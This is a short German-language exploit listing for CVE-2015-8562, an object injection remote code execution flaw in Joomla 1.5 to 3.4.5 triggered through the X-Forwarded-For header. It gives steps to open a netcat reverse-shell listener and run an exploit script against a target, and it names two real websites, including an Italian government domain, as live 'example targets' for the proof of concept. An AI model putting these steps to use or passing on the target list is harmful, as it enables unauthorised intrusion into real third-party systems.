
Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For-Header:
Datum der Sicherheitslücke: 12/17/2015
Autor des Exploits: anarc0der
Version: Joomla 1.5 bis 3.4.5
CVE : CVE-2015-8562
Vorgehen:
Öffne ein Terminal und lausche mit nc: $ nc -lnvp 4444
Öffne ein weiteres Terminal und führe den Exploit aus:
python3 rce.py --target='target' --ip='ip' --port=4444
Beispiel-Ziele PoC (Nicht kaputt machen, sie dienen anderen als Beispiel):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/